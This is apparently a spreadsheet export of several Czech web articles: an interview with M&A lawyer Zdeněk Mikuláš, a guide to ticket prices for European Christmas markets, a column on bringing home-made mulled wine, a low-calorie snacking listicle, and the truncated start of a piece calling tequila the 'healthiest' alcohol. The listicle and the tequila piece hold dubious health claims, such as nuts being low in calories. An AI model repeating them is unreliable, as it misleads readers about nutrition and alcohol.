nám nedávno prozradila, že během posledních Vánoc už jen dělala, že dárky nosí Ježíšek. Co máte večer k jídlu? Klasika, dělám bramborový salát. Každý rok míň a míň. Naposledy jsem si od svého bratra vzal jednu zavařovačku pro sebe, protože holky mají radši bramborovou kaši. Místo kapra máme lososa. Z manželčiny rodiny jsme převzali houbovou polévku, jinak v naší rodině jsme dělali čočkovou. Když říkáte holky, máte na mysli i svoji ženu? Ano. Mám tři dcery a jednu manželku, takže jsem ve velké menšině. Snažím se to akceptovat, ale někdy je to náročné, proto třeba rád běhám. Jsem ranní ptáče, někdy se mi povede vyběhnout i před štědrovečerní procházkou. Je něco, co si od pomyslného Ježíška přejete? No, to je hezká otázka. (Následuje dlouhé zamyšlení.) Asi ten poklid a že spolu jsme jako rodina. Z těch materiálních věcí, protože opravdu rád běhám, říkám: kupte mi něco na běhání, kšiltovku, tenisky, tričko… ale největším přáním pro mě je být spolu. Když jsme se dotkli rodiny, můžete ji trochu představit? Mám manželku a tři dcery. Starší bude v lednu sedmnáct let, prostřední dceři je čtrnáct a půl, nejmladší je jedenáct. Sám jsem ze tří kluků, takže mi asi bylo souzeno pro změnu mít tři holky. Prostřední bratr má taky tři děti, nejmladší má jedno dítě. Prapůvodem jsem ze Zlína . Narodil jsem se v Praze , kde moji rodiče studovali, šest měsíců po mém narození se přestěhovali do Zlína . Po maturitě jsem šel na vysokou školu do Prahy a od té doby jsem v podstatě tady. S manželkou jsme se poznali, když jí bylo patnáct, takže jsme spolu vlastně třicet let. Svatbu jsme měli po devíti letech jako bezdětní, já do té doby říkal, že ženit se budu, až budeme mít děti. Vzali jsme se v San Francisku … Skočím vám do řeči ‒ to je hodně zajímavé. Proč v USA ? Využili jsme nějaké pracovní cesty do Ameriky , spojili jsme ji se svatební cestou, kdy jsme si udělali výlet po západním pobřeží. Svatba v USA se tady uznává se vším všudy nebo se to musí nějak ověřovat? Jako pro právníka to bylo zajímavé. Tenkrát jsem pracoval v americké kanceláři, můj nadřízený partner říkal, že jsem to vymyslel chytře, že jsem se tam vzal a tady to nemám nijak uznané, že jsem tedy ženatý neženatý. Ale nebyla to svatba jako v Las Vegas . Předem jsme si museli koupit licenci, jako místo jsme si vybrali San Francisco. Hned po svatbě nám vydali upomínkový certifikát, oficiální doklad nám poslali z radnice, chyběla tam apostila, tak jsme ještě museli v Praze na ambasádě žádat o razítko a teprve potom naši svatbu uznala i mezinárodní matrika v Brně . Ještě jednou se omlouvám, že jsem přerušil vaše vyprávění o rodině. Chcete ještě něco dodat? Jsme poměrně sportovně aktivní rodina. Nepodařilo se mi dcery přesvědčit k běhání, ale těsně před kovidem se pustily do jezdectví. Všechny tři jezdí parkour, strašně je to chytlo. V zásadě jsme díky tomu přežili kovid, protože holky jezdily pětkrát týdně a u koní byly každou volnou chvilku. V létě jezdíme amatérskou krajskou ligu, i když ta nejmladší byla minulý rok třetí na mistrovství. Když jedou holky na závody, naložím si do vozíku kolo a zatímco ony závodí, já se jdu proběhnout nebo vyrazím na kole po okolí. Už jste zmínil běh, teď kolo, jaké máte ještě koníčky? Trochu se obávám, že tím jsem se téměř vyčerpal. Ale mám rád dobré víno . Dřív jsem běhal amatérské půlmaratony a maratony po střední Evropě . Teď mám tendenci běhání trošku kombinovat s vínem . Hrozně rád jezdím do Rakouska do Wachau . Červené nebo bílé? Paradoxně bílé. Červené jsme se naučili pít před lety, když jsme byli se ženou čtrnáct dnů v Toskánsku , kde když jsme chtěli bílé, tak se na nás dívali divně. Zlínsko víc než s vínem je spojené se slivovicí… Slivovici jsem úplně nepřičichl, byť jsem měl na Valachách, jak se u nás říkalo, tetu kousek od Vizovic , v Nedašově Lhotě , což je vesnice za Valašskými Klobouky. Tam se slivovice dávala ráno, v poledne, večer, kdykoli přišla návštěva, tak se dávala štamprlka. Mám to spojené s dětstvím, byl to hezký rituál. Čím jste chtěl být jako malý kluk? Já si nepamatuju, jestli jsem chtěl být kosmonautem nebo řidičem autobusu. Ale pamatuju si, čím jsem se nestal. Kromě gymnázia ve Zlíně jsem si napsal i střední truhlářskou školu, ale jsem rád, že jsem se dostal na gymnázium. Jsem strašně nešikovný na ruce, tak se bojím, že bych se na truhlařině připravil o ruku. Vážně jste neměl žádné typicky klukovské přání? Hodně rád jsem četl. Verneovky, všechny dobrodružné knížky, které se v dané době daly číst. Takže jsem chtěl být něco jako dobrodruh. Chtěl jsem být šerpou. Miluju hory, vždycky mě fascinovali šerpové v Tatrách, kam jsme jezdili pravidelně, jak nosili na Téryho chatu obrovské bágly. Asi se shodneme, že jako malý kluk jste nechtěl být právník. Rozhodně nechtěl. Jak jste se tedy k právu dostal? Náhodou, jak to tak většinou bývá. Odjakživa se považuju za liberála, člověka, který má rád svobodu. Byl jsem v prváku na gymnáziu, když byla sametová revoluce. Od té doby vnímám, jak je důležitá svoboda, možná to nějak souvisí i s tím šerpou. Ve středoškolském období mě fascinoval liberální ekonom Milton Friedman . Chodil jsem na dobrovolný předmět ekonomika a účetnictví a jednou se mě paní profesorka zeptala, jestli nechci jít na práva a já se rozhodl dělat přijímačky na ekonomku i práva, dostal jsem se na oboje a studoval v Praze obě školy paralelně, což bylo extrémně náročné, zvlášť, když v té době ještě nebyl žádný kreditní systém. S čím jsem hodně bojoval byla matematika, ta na mě jako gymnazistu byla mimořádně teoretická. Ale naopak statistika mě bavila. Duší jsem spíš tíhnul k humanitnějším oborům, ale nejdřív jsem se začal věnovat právní praxi a až později jsem začal propojovat i ekonomickou kompetenci. Šéf Předvýběru.CZ František Boudný mi o vás řekl, že jste právník, ale že on vás vnímá spíš jako obchodníka. Jak se vnímáte vy? To jsem rád, že to tak vnímá, protože já se v poslední době snažím zbavovat nálepky právníka. Právník nebo advokát zní vzletně, právo praktikuju, ale zdaleka ne jenom. Ten obchodník je čím dál nezbytnější. Dřív byly tři důležité profese, které si babičky přály, aby jejich vnoučata dělala ‒ právník, lékař a učitel. Učitelská profese se trochu upozadila, ale jinak to platí dál. Samozřejmě není právník jako právník. Nedělám trestní právo, tím, jak jsem humanitně zaměřený, propojuju právo s psychologií a empatií. Hodně pracuju s rodinami, s majiteli, právo je nástroj, ale za vším je nějaký příběh. Nepracuju pro korporace, a v menších rodinných byznysech jsou emoce hodně silné a buď pozitivně nebo negativně podnikání ovlivňují. Takže děkuju Františkovi, že mě tak vnímá. Taky mi František říkal, že aktivně používáte služby jeho personálky. Vzhledem k tomu, že jste byl poradcem při výběru nového majoritního vlastníka, mohla být taková zkušenost užitečná. Zrovna v pondělí nastoupila kolegyně, kterou jsme našli přes Předvýběr.CZ. Řešili jsme s nimi i odbornější profese. Jejich služby používáme už léta a mám jenom pozitivní zkušenost. My jsme dokonce i několika našim klientům pomohli prostřednictvím Předvýběru vyřešit nějakou personální situaci na seniorní manažerské úrovni. Vzpomenete si, jak došlo ke spolupráci při hledání většinového vlastníka? Většinou takové spolupráce začínají přes nějakou referenci. Zrovna s Františkem a Vladimírem (Kočím, druhým ze společníků Předvýběru.CZ ‒ pozn. aut.) si to velmi dobře pamatuju, protože nás propojil kluk, se kterým jsme dělali na jiném prodeji a s Františkem spolu v minulosti někde společně pracovali. Takové transakce nefungují tak, že se sejdeme a za týden je prodáno. Na začátku byly poměrně dlouhé debaty o tom, jestli prodat, kdo typologicky má být kupující, jestli český nebo zahraniční, jestli má jít o finančního investora nebo strategického. U vlastníků, kterým není přes sedmdesát, je na místě taky otázka, proč vlastně prodávat. Pánové byli velmi pragmatičtí, v prodeji podílu viděli cestu, jak dál růst. Celý proces trval tři čtyři roky. Vraťme se zpátky k vám ‒ jaký je váš dosavadní největší pracovní úspěch? Považuju za velký pracovní úspěch, že jsme vytvořili naši stávající značku. Není na trhu dlouho (svůj vznik oznámila firma loni na jaře ‒ pozn. aut.) , pro mě je úspěch, že se mi podařilo nadchnout kolegy, kteří do projektu šli se mnou. Snažíme se růst všemi možnými směry. Motto, které prosazuju, je, že v DNA každé firmy musí být růst, pohyb, prostě život. Když se zastavíme, tak umřeme. Není vám předchozí otázka povědomá? Už jste na ni kdysi odpovídal. Tehdy vaším největším úspěchem byla chystaná oslava výročí vaší tehdejší firmy, ze které jste v podstatě v zápětí odešel. To víc než plánovaný odchod připomíná útěk. Slavili jsme deset let, což jsem považoval za úspěch. Ale takové výročí vede k úvahám, co jsme za tu dobu udělali a co bude za dalších pět let… Uvědomil jsem si, že se firma už dál nerozvíjí. Paradoxně ‒ pro mě to byla schizofrenní situace, protože ten samý den, kdy jsme měli ve Vizovicích u Jelínka ve výrobně slivovice oslavu, jsem s kolegou řešil čtyři varianty exitu. Pár dní na to jsem byl s manželkou na horách na místě, kam od té doby často jezdíme, a probírali jsme, jestli mám nebo nemám odejít. Byl to určitý spouštěč. Ve staré firmě jsem cítil, že ze mě energii spíš vysává, tady naopak cítím, že ji čerpám. Nová firma existuje půldruhého roku, jak svoje rozhodnutí vnímáte dneska? Dosáhli už jste nějakého velkého úspěchu, nebo jste třeba čekal, že budete někde dál? V jistém smyslu jsme byli v zásadě startup. Vytvářeli jsme nový brand, novou firmu, ale důležité je, že lidi jsou stejní. A klienti v zásadě taky stejní. Začínali jsme tedy s nějakou historickou zkušeností, s nějakými vztahy, tedy ne s nulovým obratem jako opravdový startup. Pro mě, a myslím, že i pro ostatní, to bylo hodně povzbuzující, určitá úleva, svoboda a volnost současně. Jedeme na pozitivní energetické vlně, ta samozřejmě časem opadne. První čtyři měsíce byly punk, měli jsme jednu kancelář asi šestnáct čtverečních metrů, sedělo nás tu pět nebo šest, a přesto to bylo krásné. Z nadšení jsme museli přejít k nějakému řádu, letos už jsme si rozdělili kompetence, víme, kdo má co dělat, kdo má co na starosti. Ve startupové fázi musíte hodně improvizovat, když jsme začínali, tak jsme třeba marketing pro další růst nepotřebovali, teď jsme se mu ale systematicky začali věnovat, žádná firma nemůže žít jenom z podstaty. Nebojíte se, že vás, právníky, dřív nebo později relativně brzo nahradí umělá inteligence? Nebojím, my se naopak AI snažíme používat. V mnoha věcech už nějaká automatizace funguje, existuje spousta rutinních úkonů, které se budou dál zjednodušovat. Ale dokud nám umělá inteligence nepomůže s emocemi, nemáme se čeho bát. Vyjednat smlouvu můžete dobře nebo špatně, vyjednat cenu můžete dobře nebo špatně, to všechno pořád zůstává na lidech. V rozhodování o prodejích zůstávají emoce. Já jsem si to rozmyslel, bouchne třeba klient do stolu! To je nakonec to, co mě na té práci baví. Každý se na ty věci dívá jinak. Jak říkám, my vlastně sbíráme podnikatelské příběhy. Během rozhovoru jste zmínil svoji ženu. Pokud vím, tak tady i pracuje. Co přesně ve firmě dělá? To byste se měl zeptat jí. V zásadě má na starosti, aby firma fungovala, zodpovídá za back office a za finance. Někde vnímají back office jako špinavé, šmudlavé oddělení, ale ta část firmy, která vydělává, by bez nich nebyla schopná fungovat. Žena by vám asi řekla, že v podstatě dělá všechno. A já jsem za to rád. A klobouk dolů, řídí taky domácnost, já to mám jednodušší, snažím se řídit firmu. Máme v back office několik holek, fascinuje mě jejich efektivita, ta schopnost věci rozfázovat, roztřídit. Já se pořád ještě učím, že když je sedmnáct, osmnáct nebo devatenáct hodin, nebo víkend, tak nepracuju, od školy jsem zvyklý, že jsem moc volného času nikdy neměl. Jaké to je pracovat s vlastní ženou v jedné firmě? Žena je pro mě parťák. Spolu jsme přes třicet let, ale v jedné firmě spolu pracujeme teprve necelé dva roky. Logicky si přenášíme práci i domů. Ale někdy si říkáme, teď nepracujeme. I my se to učíme. Řízení rodiny zabere dost času a někdy už nezbývá čas pro nás dva jako pár. Jsem rád, kde jsme. Vybudovat novou firmu jsem se rozhodl opravdu po velmi pečlivé dvoudenní debatě se ženou, a jsem jí vděčný, že mě podpořila. Bez její podpory bych do toho pravděpodobně nešel. Medailonek Zdeněk Mikuláš je advokát a ekonom, zakládající partner skupiny Talers . Jeho hlavní specializací jsou fúze a akvizice, mezigenerační obměna a korporátní a byznysové poradenství zejména malých a středních firem. V letech 2011‒23 byl partnerem poradenské firmy SAMAK, předtím deset let pracoval pro advokátní kancelář White &amp;amp; Case . Vystudoval práva na Karlově univerzitě a finance na Vysoké škole ekonomické. Spolu s ženou Janou a dcerami Nikol, Viktorií a Kristýnou žijí v Říčanech u Prahy . Jeho velkým koníčkem je běhání a cyklistika. Autor: Zdeněk Fekar Autor person Zdeněk Fekar</t>
  </si>
  <si>
    <t>387</t>
  </si>
  <si>
    <t>20241201_96_3480542098_6a9f218aedfb4be0f92a.html</t>
  </si>
  <si>
    <t>6a9f218aedfb4be0f92a</t>
  </si>
  <si>
    <t>Kam na vánoční trhy v Evropě již od 179 Kč za jízdenku?</t>
  </si>
  <si>
    <t>Kam na vánoční trhy v Evropě již od 179 Kč za jízdenku? 02. 12. 2024 foto: pixabay.com / Picryl / Koně táhnoucí povoz na vánočních trzích v Norimberku Nejkrásnější vánoční trhy v Evropě v Norimberku , Vídni , Budapešti nebo Krakově nejsou od nás tak daleko a jejich návštěva je cenově dostupnější, než si myslíte. Do většiny z nich vás jedna jízdenka totiž vyjde mezi 200 až 500 Kč, proto nečekejte s jejím nákupem. Oslavy přicházejících Vánočních svátků a s tím spojené nakupovací šílenství v podobě Black Friday a přeplněných nákupních středisek je na mnohé z nás někdy moc. Vánočí trhy nejen v Česku, ale také u našich nejbližších evropských sousedů nabízejí dobrou alternativu, jak z tohoto chaosu na čas utéct, pro naše blízké pořídit hezké a originální dárky a taky načerpat trochu sváteční atmosféry. Mezi města s nejkrásnějšími a nejoriginálnějšími vánočními trhy v Evropě pravidelně každý rok patří především německý Norimberk , rakouská Vídeň , maďarská Budapešť , nebo polský Krakov . Každé z těchto měst nabízí něco jedinečného, od místních pochoutek až po nezapomenutelnou vánoční výzdobu. Samotné vánoční dekorace navíc mnohé z těchto míst dělají ještě krásnějšími a romantičtějšími než by tomu bylo bez této jedinečné sváteční atmosféry. Co mají však všechna tato města společného je především jejich relativně blízká vzdálenost z České republiky . Můžeme se do nich totiž za několik hodin pohodlně dopravit pomocí vlaku nebo autobusu. Příjemnou výhodou je navíc i skutečnost, že jízdenky ani nemusí být příliš drahé. V následujícím článku jsme pro vás připravili popis všech těchto vánočních trhů, jejich specifika, ale především také doporučení týkající se dopravy a ceny za jízdenky (pozn. red.: ceny jízdenek byly stanoveny k 30.11.2024). Si viajas a Europa estas Navidades, aquí la lista de los mejores Mercadillos Navideños🎅🏻🎄 🇦 🇹Vienna , Austria - Nov 16 to Dec 24 🇫🇷 Strasbourg , France - Nov 27 to Dec 30 🇨🇿 Prague , Czech Republic - 30 Nov to Jan 6 🇩🇪 Berlin ( Gendarmenmarkt ), Germany - Nov 25 to Dec 31 — Miguel Morenatti (@MiguelMorenatti) November 28, 2024 Norimberk : Kouzlo vánočních trhů Christkindlesmarkt na náměstí Hauptmarkt Norimberk je domovem jednoho z nejstarších vánočních trhů na světě, který se označuje jako Nürnberger Christkindlesmarkt. Tento trh na hlavním náměstí Hauptmarkt je dle informací z oficiálních webových stránek Christkindlesmarkt známý svou autentickou atmosférou. Dřevěné stánky zde nabízejí tradiční norimberské speciality, jako perník Elisenlebkuchen nebo klobásy Rostbratwurst. Symbolem trhu je postava Ježíška, kterou však představuje mladá dívka. Děti na vánočním trhu Christkindlesmarkt potěší množství kolotočů, divadlo, a světelný průvod, který se uskuteční ve čtvrtek 12. prosince okolo 6 hodiny večer. Trhy se letos konají od 29. listopadu do 24. prosince 2024. Cena jedné cesty z Prahy do Norimberku autobusem společnosti FlixBus bez přestupu se pohybuje od 509 Kč do přibližně 1600 Kč a rozhodně se vyplatí cestovat spíše přes týden než o víkendu, kdy jsou ceny vzhledem k poptávce vyšší. Jízdenky nabízí také společnost RegioJet , avšak pouze v nočních hodinách. Cena jedné jízdy je přibližně 419-489 Kč. Jízdenky nabízí také České dráhy již od 439 Kč ve všední den, avšak se dvěma přestupy v Chebu a německém městě Marktredwitz . Vídeň : Elegance rakouských vánočních trhů Christkindlmärkte Vídeňské vánoční trhy jsou pověstné svou velkolepostí a rozmanitostí. Na výběr navíc máte dle Visiting Vienna hned z několika možností mezi něž patří asi nejznámější Christkindlmarkt před vídeňskou radnicí, trhy v zahradách paláců Schönbrunn nebo Belvedere nebo stánky před katedrálou na Stephansplatz. Právě na trhu na náměstí Rathausplatz před vídeňskou radnicí si můžete vychutnat pohled na nádherný vánoční strom s tisíci světýlek. Typické pochutiny, které můžete na víděňských trzích ochutnat, zahrnují svařené víno , pražené kaštany a rakouské pečivo. Na vánočních trzích ve Vídni navíc najdete jednu specifickou tradici, která je pro toto město typická již několik let. Na většině z trhů se totiž prodávají ikonické hrnečky, do kterých se podává svařené víno (Glühwein), punč nebo horká čokoláda, a které si můžete nechat jako suvenýr. Tyto hrnečky jsou obvykle označeny názvem konkrétního trhu, rokem a někdy i vánočními motivy. Po zakoupení nápoje zaplatíte zálohu (většinou 2-6 €), kterou vám vrátí, pokud hrneček odevzdáte. Pokud si ho chcete ponechat, záloha slouží jako cena za suvenýr. Kromě tradičních stánků ve Vídni také probíhají koncerty a kulturní akce. Trhy ve Vídni mají hlubokou historii, sahající až do 13. století, což dodává celé atmosféře historický nádech. Z hlediska času a financí se jízda do Vídně nejvíce vyplatí lidem žijícím v Brně , Olomouci , Břeclavi a dalších moravských městech. Jízdenka společnosti FlixBus z Brna vás vyjde přibližně na 319 Kč až 1009 Kč o víkendu a RegioJet nabízí množství možností od 179 do asi 500 Kč za jednu jízdu vlakem nebo autobusem. Samozřejmou možností jsou také České dráhy, které nabízejí jízdenky v rozmezí od 181 Kč až do přibližně 516 Kč. Budapešť : Magie vánočních trhů u Dunaje Budapešťské vánoční trhy se podobně jako v případě Vídně dle Budapest by locals konají hned na několika místech ve městě. Nejvýznamnější jsou trhy na náměstí Vörösmarty a podobně jako v metropololi Rakouska před bazilikou sv. Štěpána . Lákadlem je především místní kuchyně, která kromě tradičních langošů nabízí také množství dalších pochoutek jako sladký kürtőskalács (trdelník), rybí polévka halászlé nebo töltött káposzta, zelné listy plněné směsí mletého masa a rýže. Samozřejmě nechybí stejně jako v Německu , Rakousku , Polsku nebo Česku tradiční svařené víno nebo různé druhy pálenek. Unikátní zážitek trhů nabízí kromě jídla také světelná show na fasádě baziliky, která přitahuje návštěvníky z celého světa. Trhy probíhají od 15. listopadu 2024 do 1. ledna 2025. Vzhledem ke vzdálenosti je nejlepší cesta do Budapešti rovněž z Brna a za jednu jízdenku Českých drah zaplatíte od 374 do asi 993 Kč. Ceny autobusových jízdenek nabízených společností Flixbus se pohybují od 459 Kč do něco mála přes 1000 Kč. RegioJet opět nabízí jízdenky na autobus i vlak, které začínají již na 399 Kč. Krakov : Tradiční polská pohostinnost a vánoční trhy s folklorními zvyky Krakovské vánoční trhy na Rynku Główném kombinují polské tradice s kouzelnou adventní atmosférou. Mezi největší lákadla patří místní speciality, jako jsou pierogi (plněné taštičky) a čechům velmi dobře známé grzaniec galicyjski (svařené víno ). Trhy se podle informací oficiálních webových stránek trhů v Krakově konají od 29. listopadu 2024 do 1. ledna 2025, a město nabízí také bohatý doprovodný program, včetně různých druhů folklórních vystoupení. Krakov je relativně dobře dostupný zase především z Brna , jelikož z Prahy trvá cesta 7,5 až 9 hodin. Za víkendovou jízdenku z Brna do Krakova chce společnost Flixbus od 509 Kč až do 919 Kč, ale v týdnu vás nepřijde na příliš levněji. Jízdenka společnosti RegioJet se pohybuje od 469 do 1049 Kč. O něco levnější jsou trochu překvapivě České dráhy, které nabízejí jízdenky ve všední den od 387 Kč a o víkendu pak od přibližně 671 Kč. Cesta vlakem je však o trochu delší než autobus, protože musíte přestoupit na EC v Břeclavi . S nákupem jízdenek na vánoční trhy příliš neotálejte Každý z těchto vánočních trhů v Německu , Rakousku , Polsku nebo Maďarsku má svůj jedinečný charakter, který odráží místní kulturu a tradice. Norimberk zaujme historií a gastronomií, Vídeň elegancí a romantikou, Budapešť magií světel a Krakov srdečnou atmosférou a bohatým folklorním programem. Pokud proto plánujete cestu do některé z těchto destinací s nákupem jízdenek příliš neváhejte, protože jejich cena se odvíjí od poptávky a především také toho, s jakým předstihem si lístky koupíte. Autor: Vlaďka Krejčí Autor person Vlaďka Krejčí Rubrika transition_slide News</t>
  </si>
  <si>
    <t>20241201_97_3477205949_829889e9233040cbf791.html</t>
  </si>
  <si>
    <t>829889e9233040cbf791</t>
  </si>
  <si>
    <t>„Svůj svařák mám v&amp;nbsp;hrnku a&amp;nbsp;mé cukroví v&amp;nbsp;kapse,“ chlubil jsem se na trzích</t>
  </si>
  <si>
    <t>„Svůj svařák mám v&amp;nbsp;hrnku a&amp;nbsp;mé cukroví v&amp;nbsp;kapse,“ chlubil jsem se na trzích „Svůj svařák mám v hrnku a mé cukroví v kapse,“ chlubil jsem se na trzích Na vánoční trhy už chodím jen za atmosférou a přáteli. Jídlo a pití si raději nosím z domova. Nikdy by mě nenapadlo přinést si například do restaurace vlastní jídlo a pití. Ale na vánoční trhy? Proč ne. Je to veřejný prostor, náměstí, kde probíhá nějaký kulturní program. Nemám povinnost, když se ho účastním, dávat peníze trhovcům za to, že mi připraví něco k pití nebo k jídlu. Stejně jako si mohu na náměstí během celého roku jíst a pít vlastní zásoby, můžu to dělat i v době vánočních trhů. Dal bych si, ale stojí to peníze Ne, že bych si pro korunu nechal vrtat koleno. V restauraci za dobré jídlo a dobré pivo své peníze vždycky rád utratím. Ale že bych na vánočních trzích dostal něco opravdu dobrého, to už několik posledních let říct nemohu. Připadá mi, že ceny stoupají rychleji než kvalita. Ta zůstává stejná, možná se dokonce snižuje, ale cena rok od roku roste. Mám na svařák, na klobásu i na nějaký jiný pokrm. O peníze nejde. Chci si za ně pochutnat. Chci, aby to stálo za to. Nechci klobásu s minimem masa, stejně jako nechci svařák z krabicového vína , naředěného vodou. Za něco podobného své peníze jednoduše dát nechci. Svařák mám v termosce a cukroví v kapse A tak jsem ten, kdo po vánočních trzích bloumá s batůžkem, ve kterém mám termosku s horkým, doma udělaným svařákem. Z dobrého vína , s kořením, přesně tak, jak to mám rád. A vyšlo mě to na zlomek toho, co by chtěl za stejný objem trhovec s pochybnou kvalitou. V ruce držím termohrnek, pomalu usrkávám a užívám si vánoční atmosféru. Bez zklamání z toho, že jsem pro trhovce jen chodící peněženka, kterou je třeba co nejrychleji vyprázdnit. Čas od času sáhnu do kapsy, kde mám sáček s vánočním cukrovím. No jo, ke svařáku není nic lepšího než něco sladkého. Také domácí výroby, bez rizika, že koupím něco pochybného, kde není ani gram másla, a kde byl důraz při výrobě kladen hlavně na to, abych byl ošizen. Kde jsi to vzal? No přece doma Procházím se po trzích, prohlížím stánky, poslouchám hudbu. Tu a tam potkám přátele a známé, kteří se pochopitelně diví, z čeho piji svařák a proč šmátrám do kapsy. A ne, nikdo mě nemá za „socku“, ale za „průkopníka“. Prý je to dobrý nápad. Podle toho, jak mluví o nabídce a její kvalitě, to vypadá, že nás každý den bude na trzích s vlastní termoskou a vlastním cukrovím víc a víc. No, milí prodejci, kteří nás berete na hůl, můžete si za to sami. Já své peníze radši utratím v restauraci, kde se kvalitně a dobře najím a napiji, než abych je odevzdal u stánku s bůhvíčím.</t>
  </si>
  <si>
    <t>20241201_98_3477193193_dd8236890a246a1dbb78.html</t>
  </si>
  <si>
    <t>dd8236890a246a1dbb78</t>
  </si>
  <si>
    <t>Nízkokalorické mlsání: 5 tipů, jak si zdravě pochutnat!</t>
  </si>
  <si>
    <t>Nízkokalorické mlsání: 5 tipů, jak si zdravě pochutnat! Tvaroh a Povidla.cz 1. 12. 2024 Rádi si občas dopřejete sladkou odměnu, ale nechcete rušit svůj zdravý životní styl? V našem článku vám přinášíme 5 tipů, jak si pochutnat na nízkokalorickém mlsání! Zjistěte, jak si vychutnat lahodné dobroty bez výčitek a udržet si svou vitalitu a kondici. Přečtěte si více pro inspiraci a nové zdravé pochoutky! Obsah článku Nenechte si ujít: Zákusek bez viny: jak si vybrat nízkokalorické možnosti Pokud máte chuť na nějaký sladký zákusek, neznamená to, že musíte hned přidat na váze. Existuje mnoho nízkokalorických možností, které si můžete pochutnat, aniž byste se museli cítit provinile. Zde je pět tipů, jak si zdravě dopřát sladké pochoutky: Ovocné smoothie: Namísto těžkého dortu si dejte sklenici osvěžujícího ovocného smoothie. Stačí smíchat oblíbené ovoce s nízkotučným jogurtem nebo mandlovým mlékem. Proteinové tyčinky: Místo cukrových tyčinek si vyberte proteinovou tyčinku, která vám dodá energii a zasytí vás na delší dobu. Čokoládové oříšky: Máte chuť na čokoládu? Zkuste si dopřát pár kousků čokoládových oříšků, které jsou bohaté na antioxidanty a zdravé tuky. Je důležité si pamatovat, že i při výběru nízkokalorických možností je důležité mít měřený přístup a nezapomínat na vyváženou stravu a dostatečný přísun živin. Tak si můžete zdravě pochutnat a zároveň si udržet svoji postavu. Suroviny na prvním místě: recepty s minimem kalorií a maximem chuti Vyzkoušejte naše recepty na nízkokalorické pochoutky, které vám zaručeně zvednou náladu a nezatíží váš rozpočet! Pokud máte chuť na sladké, zkuste si připravit osvěžující ovocný šalát s mátou a limetkou. Namísto pravidelného popcornu s máslem a solí si doma udělejte křupavé kuří pečínky, které obsahují mnohem méně kalorií. Nezklame vás ani zdravý hummus s čerstvou zeleninou jako jemná svačinka kdykoliv během dne. Recept Ovocný šalát 50 kcal Kuří pečínky 80 kcal Hummus s zeleninou 70 kcal Zdravé sladké alternativy: dezerty bez přebytečných cukrů Pokud si rádi dopřáváte sladkosti, ale chtěli byste se vyhnout přebytečným cukrům, máme pro vás skvělou zprávu! Existuje mnoho zdravých alternativ, které vám umožní si pochutnat bez viny. Zde jsou naše tipy na nízkokalorické mlsání: Cuketový dort: Ano, dobře jste slyšeli! Cuketa je skvělou náhradou pro cukr ve sladkých dezertech a dodává úžasnou vlhkost a chuť. Ovesné sušenky: Nahraďte klasické vánoční cukroví ovesnými sušenkami. Jsou plné vlákniny a chutnají úžasně s kávou nebo čajem. Chia puding: Zdravý náhražka pudingů plných cukrů. Chia semínka obsahují spoustu omega-3 mastných kyselin a vlákniny. Vyzkoušejte tyto recepty a uvidíte, že si můžete pochutnat bez obav z přebytečných cukrů. Vaše tělo vám poděkuje! Spořádat, aniž byste to i pocítili: triky na snížení kalorií při mlsání Chcete si dopřát nějakou pochoutku, ale zároveň se snažíte udržet svou kalorickou spotřebu pod kontrolou? Nevěšte hlavu, existuje pár triků, jak si mlsat zdravě a bez vědomí zbytečných kalorií! S klidem si užijte své oblíbené mlsání s těmito nízkokalorickými tipy: Oblíbené oříšky – sázejte na mandle, pistácie nebo lískové oříšky, které obsahují zdravé tuky a málo kalorií. Čerstvé ovoce – skvělá volba pro sladkou chuť bez přebytečných cukrů. Například jahody, hroznové víno nebo ananas. Temné čokoládové pochoutky – zvolte čokoládu s vyšším obsahem kakaa, která je bohatá na antioxidanty a má nižší kalorickou hodnotu než mléčná čokoláda. Vyvážené stravování s pochoutkami: jak si dopřát bez následných pocitů viny Vyvážené stravování je základem zdravého životního stylu, ale občas si člověk prostě potřebuje dopřát něco sladkého nebo slaného. Pokud se bojíte, že si sváděním pochoutek přidáte nežádoucí kalorie, nebojte se - existuje způsob, jak si zdravě pochutnat bez následných pocitů viny. Zde je pět tipů, jak si dopřát nízkokalorické mlsání: Ovocné dezerty: Namísto sladkostí plných rafinovaného cukru si dopřejte čerstvé ovoce nebo smoothie. Jsou plné vlákniny a vitamínů, které tělo potřebuje. Luštěniny: Nízkokalorický a plný bílkovin, důležitých pro udržení svalové hmoty. Rozmažte si hummus na plátek celozrnného chleba nebo si připravte lehký fazolový salát. Ořechy: Jsou bohaté na zdravé tuky a mohou zasytit i malé množství. Zkuste si dopřát hrst mandlí nebo kešu ořechů jako zdravou svačinu. Klíčové Poznatky V tomto článku jsme se podívali na pět tipů, jak si užít zdravé a nízkokalorické mlsání. Je důležité si uvědomit, že se nemusíte vzdát dobrého jídla jen proto, že chcete zůstat ve formě. S trochou kreativity a plánování můžete snadno začlenit do svého jídelníčku zdravé občerstvení, které nezatíží vaši postavu. Pamatujte, že každý krok směrem k lepší výživě a zdravějšímu životnímu stylu je důležitý. Tak si pochutnejte, buďte aktivní a pečujte o své tělo. Vaše zdraví je vaše největší bohatství! Nenechte si ujít: Rubrika transition_slide Dezerty</t>
  </si>
  <si>
    <t>20241201_99_3477191444_fcbadbd88a5935d1775f.html</t>
  </si>
  <si>
    <t>fcbadbd88a5935d1775f</t>
  </si>
  <si>
    <t>Lékař prozradil, proč je jeden alkoholický nápoj „nejzdravější volbou“ a věda to potvrzuje</t>
  </si>
  <si>
    <t>Lékař prozradil, proč je jeden alkoholický nápoj „nejzdravější volbou“ a věda to potvrzuje alkohol , noshp, zdraví Výběr správného alkoholického nápoje může být náročný. Pokud si chcete občas dopřát a přitom minimalizovat negativní dopady na zdraví, jeden konkrétní druh destilátu vyčnívá díky svým neobvyklým vlastnostem. Co jej činí tak výjimečným? Alkoholické nápoje obecně nemají nejlepší pověst, co se týče zdraví. Obsahují prázdné kalorie, často se míchají s cukernatými přísadami a nadměrná konzumace může vést k celé řadě zdravotních problémů. Přesto odborníci uvádějí, že mezi nimi existuje jeden, který lze považovat za „nejzdravější volbu“. Nejde však jen o marketingový trik – podporují to i vědecké poznatky. Tento nápoj má nízký obsah cukru, málo kalorií a dokonce obsahuje látky, které mohou být přínosné pro tělo. Význam složení nápojů pro zdraví Ne všechny alkoholické nápoje jsou stejné. Pivo obsahuje vysoké množství sacharidů, víno zase dodává tělu cukry, zatímco míchané drinky bývají doslova kalorickými bombami. Jestli hledáte způsob, jak si občas užít alkohol bez zbytečných výčitek, je klíčem nejen volba typu nápoje, ale i způsob jeho výroby. Odborníci upozorňují, že čisté destiláty bez přídavků příchutí, barviv a cukru mohou mít na tělo menší dopad než jejich více zpracované protějšky. Ano jedná se o tequilu Foto Shutterstock A 